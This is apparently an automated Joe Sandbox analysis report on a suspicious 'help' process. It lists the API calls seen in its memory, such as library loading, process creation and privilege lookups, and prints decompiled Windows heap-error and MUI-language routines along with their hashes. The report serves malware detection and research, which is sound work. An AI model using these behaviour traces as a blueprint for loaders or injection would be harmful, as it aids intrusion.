                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 302 2dda660-2dda691 call 2ddaf50 RtlFreeHeap
                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02DC3AF8), ref: 02DDA68D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID: .z`
                            • API String ID: 3298025750-1441809116
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 305 2dc8308-2dc831f 306 2dc8328-2dc835a call 2ddc9f0 call 2dcace0 call 2dd4e40 305->306 307 2dc8323 call 2ddbe50 305->307 314 2dc835c-2dc836e PostThreadMessageW 306->314 315 2dc838e-2dc8392 306->315 307->306 316 2dc838d 314->316 317 2dc8370-2dc838b call 2dca470 PostThreadMessageW 314->317 316->315 317->316
                            APIs
                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC836A
                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC838B
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02DC836A
                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02DC838B
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 530 2dcace0-2dcacfc 531 2dcad04-2dcad09 530->531 532 2dcacff call 2ddcc40 530->532 533 2dcad0f-2dcad1d call 2ddd060 531->533 534 2dcad0b-2dcad0e 531->534 532->531 537 2dcad2d-2dcad3e call 2ddb490 533->537 538 2dcad1f-2dcad2a call 2ddd2e0 533->538 543 2dcad57-2dcad5a 537->543 544 2dcad40-2dcad54 LdrLoadDll 537->544 538->537 544->543
                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DCAD52
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 545 2dda6d0-2dda728 call 2ddaf50 CreateProcessInternalW
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DDA724
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 548 2dda6ce-2dda6e9 549 2dda6ef-2dda728 CreateProcessInternalW 548->549 550 2dda6ea call 2ddaf50 548->550 550->549
                            APIs
                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02DDA724
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInternalProcess
                            • String ID:
                            • API String ID: 2186235152-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02DCF040,?,?,00000000), ref: 02DD91DC
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(02DD4526,?,02DD4C9F,02DD4C9F,?,02DD4526,?,?,?,?,?,00000000,00000000,?), ref: 02DDA64D
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCF1C2,02DCF1C2,?,00000000,?,?), ref: 02DDA7F0
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,02DC8D14,?), ref: 02DCF6EB
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,02DC8D14,?), ref: 02DCF6EB
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02DCF1C2,02DCF1C2,?,00000000,?,?), ref: 02DDA7F0
                            Memory Dump Source
                            • Source File: 00000002.00000002.510495926.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_2dc0000_help.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
                            • Instruction ID: 1af0dfa8aaa3e4bca2caa01c24db564de267b144821823e2931f99c0a81a84b9
                            • Opcode Fuzzy Hash: c07a334b6f75cd5efb891f5ad5909943385acd43cc3995a7d8a156a91af7f58e
                            • Instruction Fuzzy Hash: B4B09B719014D5C5D651D7E04A08B2B7D047BD0741F17C5D1D2124755B4778C095F5B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • This failed because of error %Ix., xrefs: 0387B446
                            • a NULL pointer, xrefs: 0387B4E0
                            • The resource is owned shared by %d threads, xrefs: 0387B37E
                            • an invalid address, %p, xrefs: 0387B4CF
                            • The instruction at %p referenced memory at %p., xrefs: 0387B432
                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0387B323
                            • <unknown>, xrefs: 0387B27E, 0387B2D1, 0387B350, 0387B399, 0387B417, 0387B48E
                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0387B314
                            • read from, xrefs: 0387B4AD, 0387B4B2
                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0387B38F
                            • write to, xrefs: 0387B4A6
                            • *** then kb to get the faulting stack, xrefs: 0387B51C
                            • The instruction at %p tried to %s , xrefs: 0387B4B6
                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0387B352
                            • The resource is owned exclusively by thread %p, xrefs: 0387B374
                            • *** enter .cxr %p for the context, xrefs: 0387B50D
                            • *** Inpage error in %ws:%s, xrefs: 0387B418
                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0387B476
                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0387B3D6
                            • *** An Access Violation occurred in %ws:%s, xrefs: 0387B48F
                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0387B2F3
                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0387B2DC
                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0387B53F
                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0387B47D
                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0387B305
                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0387B484
                            • *** enter .exr %p for the exception record, xrefs: 0387B4F1
                            • Go determine why that thread has not released the critical section., xrefs: 0387B3C5
                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0387B39B
                            • The critical section is owned by thread %p., xrefs: 0387B3B9
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                            • API String ID: 0-108210295
                            • Opcode ID: 1d8e9603aaccd2917a0011aa3a1295c81a0c6a4536cb5fcf1c09f4a3f09669f0
                            • Instruction ID: bfe83b314bf26c7649a7873808a5d5c1c613460d15bc24c047eb6ab6aa1cb921
                            • Opcode Fuzzy Hash: 1d8e9603aaccd2917a0011aa3a1295c81a0c6a4536cb5fcf1c09f4a3f09669f0
                            • Instruction Fuzzy Hash: A381F3B9A00200FFDB26DE898C85EAF3F77AF46A55F4400D4F416AF222D361D551CAB2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E03881C06() {
                            				signed int _t27;
                            				char* _t104;
                            				char* _t105;
                            				intOrPtr _t113;
                            				intOrPtr _t115;
                            				intOrPtr _t117;
                            				intOrPtr _t119;
                            				intOrPtr _t120;
                            
                            				_t105 = 0x37a48a4;
                            				_t104 = "HEAP: ";
                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            					_push(_t104);
                            					E037CB150();
                            				} else {
                            					E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            				}
                            				_push( *0x38b589c);
                            				E037CB150("Heap error detected at %p (heap handle %p)\n",  *0x38b58a0);
                            				_t27 =  *0x38b5898; // 0x0
                            				if(_t27 <= 0xf) {
                            					switch( *((intOrPtr*)(_t27 * 4 +  &M03881E96))) {
                            						case 0:
                            							_t105 = "heap_failure_internal";
                            							goto L21;
                            						case 1:
                            							goto L21;
                            						case 2:
                            							goto L21;
                            						case 3:
                            							goto L21;
                            						case 4:
                            							goto L21;
                            						case 5:
                            							goto L21;
                            						case 6:
                            							goto L21;
                            						case 7:
                            							goto L21;
                            						case 8:
                            							goto L21;
                            						case 9:
                            							goto L21;
                            						case 0xa:
                            							goto L21;
                            						case 0xb:
                            							goto L21;
                            						case 0xc:
                            							goto L21;
                            						case 0xd:
                            							goto L21;
                            						case 0xe:
                            							goto L21;
                            						case 0xf:
                            							goto L21;
                            					}
                            				}
                            				L21:
                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            					_push(_t104);
                            					E037CB150();
                            				} else {
                            					E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            				}
                            				_push(_t105);
                            				E037CB150("Error code: %d - %s\n",  *0x38b5898);
                            				_t113 =  *0x38b58a4; // 0x0
                            				if(_t113 != 0) {
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E037CB150();
                            					} else {
                            						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					E037CB150("Parameter1: %p\n",  *0x38b58a4);
                            				}
                            				_t115 =  *0x38b58a8; // 0x0
                            				if(_t115 != 0) {
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E037CB150();
                            					} else {
                            						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					E037CB150("Parameter2: %p\n",  *0x38b58a8);
                            				}
                            				_t117 =  *0x38b58ac; // 0x0
                            				if(_t117 != 0) {
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E037CB150();
                            					} else {
                            						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					E037CB150("Parameter3: %p\n",  *0x38b58ac);
                            				}
                            				_t119 =  *0x38b58b0; // 0x0
                            				if(_t119 != 0) {
                            					L41:
                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            						_push(_t104);
                            						E037CB150();
                            					} else {
                            						E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            					}
                            					_push( *0x38b58b4);
                            					E037CB150("Last known valid blocks: before - %p, after - %p\n",  *0x38b58b0);
                            				} else {
                            					_t120 =  *0x38b58b4; // 0x0
                            					if(_t120 != 0) {
                            						goto L41;
                            					}
                            				}
                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                            					_push(_t104);
                            					E037CB150();
                            				} else {
                            					E037CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                            				}
                            				return E037CB150("Stack trace available at %p\n", 0x38b58c0);
                            			}












                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                            • API String ID: 0-2897834094
                            • Opcode ID: 6655a955da886352295f907e235c27cd459049758f0f8535fea9186e5091aed1
                            • Instruction ID: 10648fc27ef876e5d22cea7e045687d092bcd837aab44ba7e88dd6896fe4f045
                            • Opcode Fuzzy Hash: 6655a955da886352295f907e235c27cd459049758f0f8535fea9186e5091aed1
                            • Instruction Fuzzy Hash: 05615636521A89DFD611F7C8E4CEF6573B5EB04A6470980BEF40B9F712DA349C42CA19
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E037D3D34(signed int* __ecx) {
                            				signed int* _v8;
                            				char _v12;
                            				signed int* _v16;
                            				signed int* _v20;
                            				char _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				char _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				signed int* _v48;
                            				signed int* _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				char _v68;
                            				signed int _t140;
                            				signed int _t161;
                            				signed int* _t236;
                            				signed int* _t242;
                            				signed int* _t243;
                            				signed int* _t244;
                            				signed int* _t245;
                            				signed int _t255;
                            				void* _t257;
                            				signed int _t260;
                            				void* _t262;
                            				signed int _t264;
                            				void* _t267;
                            				signed int _t275;
                            				signed int* _t276;
                            				short* _t277;
                            				signed int* _t278;
                            				signed int* _t279;
                            				signed int* _t280;
                            				short* _t281;
                            				signed int* _t282;
                            				short* _t283;
                            				signed int* _t284;
                            				void* _t285;
                            
                            				_v60 = _v60 | 0xffffffff;
                            				_t280 = 0;
                            				_t242 = __ecx;
                            				_v52 = __ecx;
                            				_v8 = 0;
                            				_v20 = 0;
                            				_v40 = 0;
                            				_v28 = 0;
                            				_v32 = 0;
                            				_v44 = 0;
                            				_v56 = 0;
                            				_t275 = 0;
                            				_v16 = 0;
                            				if(__ecx == 0) {
                            					_t280 = 0xc000000d;
                            					_t140 = 0;
                            					L50:
                            					 *_t242 =  *_t242 | 0x00000800;
                            					_t242[0x13] = _t140;
                            					_t242[0x16] = _v40;
                            					_t242[0x18] = _v28;
                            					_t242[0x14] = _v32;
                            					_t242[0x17] = _t275;
                            					_t242[0x15] = _v44;
                            					_t242[0x11] = _v56;
                            					_t242[0x12] = _v60;
                            					return _t280;
                            				}
                            				if(E037D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                            					_v56 = 1;
                            					if(_v8 != 0) {
                            						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                            					}
                            					_v8 = _t280;
                            				}
                            				if(E037D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                            					_v60 =  *_v8;
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                            					_v8 = _t280;
                            				}
                            				if(E037D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                            					L16:
                            					if(E037D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                            						L28:
                            						if(E037D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                            							L46:
                            							_t275 = _v16;
                            							L47:
                            							_t161 = 0;
                            							L48:
                            							if(_v8 != 0) {
                            								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                            							}
                            							_t140 = _v20;
                            							if(_t140 != 0) {
                            								if(_t275 != 0) {
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                            									_t275 = 0;
                            									_v28 = 0;
                            									_t140 = _v20;
                            								}
                            							}
                            							goto L50;
                            						}
                            						_t167 = _v12;
                            						_t255 = _v12 + 4;
                            						_v44 = _t255;
                            						if(_t255 == 0) {
                            							_t276 = _t280;
                            							_v32 = _t280;
                            						} else {
                            							_t276 = L037E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                            							_t167 = _v12;
                            							_v32 = _t276;
                            						}
                            						if(_t276 == 0) {
                            							_v44 = _t280;
                            							_t280 = 0xc0000017;
                            							goto L46;
                            						} else {
                            							E0380F3E0(_t276, _v8, _t167);
                            							_v48 = _t276;
                            							_t277 = E03811370(_t276, 0x37a4e90);
                            							_pop(_t257);
                            							if(_t277 == 0) {
                            								L38:
                            								_t170 = _v48;
                            								if( *_v48 != 0) {
                            									E0380BB40(0,  &_v68, _t170);
                            									if(L037D43C0( &_v68,  &_v24) != 0) {
                            										_t280 =  &(_t280[0]);
                            									}
                            								}
                            								if(_t280 == 0) {
                            									_t280 = 0;
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                            									_v44 = 0;
                            									_v32 = 0;
                            								} else {
                            									_t280 = 0;
                            								}
                            								_t174 = _v8;
                            								if(_v8 != 0) {
                            									L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                            								}
                            								_v8 = _t280;
                            								goto L46;
                            							}
                            							_t243 = _v48;
                            							do {
                            								 *_t277 = 0;
                            								_t278 = _t277 + 2;
                            								E0380BB40(_t257,  &_v68, _t243);
                            								if(L037D43C0( &_v68,  &_v24) != 0) {
                            									_t280 =  &(_t280[0]);
                            								}
                            								_t243 = _t278;
                            								_t277 = E03811370(_t278, 0x37a4e90);
                            								_pop(_t257);
                            							} while (_t277 != 0);
                            							_v48 = _t243;
                            							_t242 = _v52;
                            							goto L38;
                            						}
                            					}
                            					_t191 = _v12;
                            					_t260 = _v12 + 4;
                            					_v28 = _t260;
                            					if(_t260 == 0) {
                            						_t275 = _t280;
                            						_v16 = _t280;
                            					} else {
                            						_t275 = L037E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                            						_t191 = _v12;
                            						_v16 = _t275;
                            					}
                            					if(_t275 == 0) {
                            						_v28 = _t280;
                            						_t280 = 0xc0000017;
                            						goto L47;
                            					} else {
                            						E0380F3E0(_t275, _v8, _t191);
                            						_t285 = _t285 + 0xc;
                            						_v48 = _t275;
                            						_t279 = _t280;
                            						_t281 = E03811370(_v16, 0x37a4e90);
                            						_pop(_t262);
                            						if(_t281 != 0) {
                            							_t244 = _v48;
                            							do {
                            								 *_t281 = 0;
                            								_t282 = _t281 + 2;
                            								E0380BB40(_t262,  &_v68, _t244);
                            								if(L037D43C0( &_v68,  &_v24) != 0) {
                            									_t279 =  &(_t279[0]);
                            								}
                            								_t244 = _t282;
                            								_t281 = E03811370(_t282, 0x37a4e90);
                            								_pop(_t262);
                            							} while (_t281 != 0);
                            							_v48 = _t244;
                            							_t242 = _v52;
                            						}
                            						_t201 = _v48;
                            						_t280 = 0;
                            						if( *_v48 != 0) {
                            							E0380BB40(_t262,  &_v68, _t201);
                            							if(L037D43C0( &_v68,  &_v24) != 0) {
                            								_t279 =  &(_t279[0]);
                            							}
                            						}
                            						if(_t279 == 0) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                            							_v28 = _t280;
                            							_v16 = _t280;
                            						}
                            						_t202 = _v8;
                            						if(_v8 != 0) {
                            							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                            						}
                            						_v8 = _t280;
                            						goto L28;
                            					}
                            				}
                            				_t214 = _v12;
                            				_t264 = _v12 + 4;
                            				_v40 = _t264;
                            				if(_t264 == 0) {
                            					_v20 = _t280;
                            				} else {
                            					_t236 = L037E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                            					_t280 = _t236;
                            					_v20 = _t236;
                            					_t214 = _v12;
                            				}
                            				if(_t280 == 0) {
                            					_t161 = 0;
                            					_t280 = 0xc0000017;
                            					_v40 = 0;
                            					goto L48;
                            				} else {
                            					E0380F3E0(_t280, _v8, _t214);
                            					_t285 = _t285 + 0xc;
                            					_v48 = _t280;
                            					_t283 = E03811370(_t280, 0x37a4e90);
                            					_pop(_t267);
                            					if(_t283 != 0) {
                            						_t245 = _v48;
                            						do {
                            							 *_t283 = 0;
                            							_t284 = _t283 + 2;
                            							E0380BB40(_t267,  &_v68, _t245);
                            							if(L037D43C0( &_v68,  &_v24) != 0) {
                            								_t275 = _t275 + 1;
                            							}
                            							_t245 = _t284;
                            							_t283 = E03811370(_t284, 0x37a4e90);
                            							_pop(_t267);
                            						} while (_t283 != 0);
                            						_v48 = _t245;
                            						_t242 = _v52;
                            					}
                            					_t224 = _v48;
                            					_t280 = 0;
                            					if( *_v48 != 0) {
                            						E0380BB40(_t267,  &_v68, _t224);
                            						if(L037D43C0( &_v68,  &_v24) != 0) {
                            							_t275 = _t275 + 1;
                            						}
                            					}
                            					if(_t275 == 0) {
                            						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                            						_v40 = _t280;
                            						_v20 = _t280;
                            					}
                            					_t225 = _v8;
                            					if(_v8 != 0) {
                            						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                            					}
                            					_v8 = _t280;
                            					goto L16;
                            				}
                            			}


                            Strings
                            • Kernel-MUI-Language-Disallowed, xrefs: 037D3E97
                            • Kernel-MUI-Language-Allowed, xrefs: 037D3DC0
                            • Kernel-MUI-Language-SKU, xrefs: 037D3F70
                            • WindowsExcludedProcs, xrefs: 037D3D6F
                            • Kernel-MUI-Number-Allowed, xrefs: 037D3D8C
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                            • API String ID: 0-258546922
                            • Opcode ID: 95910082b004476454afa251cd7fbebf14dece42711457b91c8010cb88778d98
                            • Instruction ID: 1f55971ddf9a00bbfa5b37fca320246be361de694937273a53282851c526cef7
                            • Opcode Fuzzy Hash: 95910082b004476454afa251cd7fbebf14dece42711457b91c8010cb88778d98
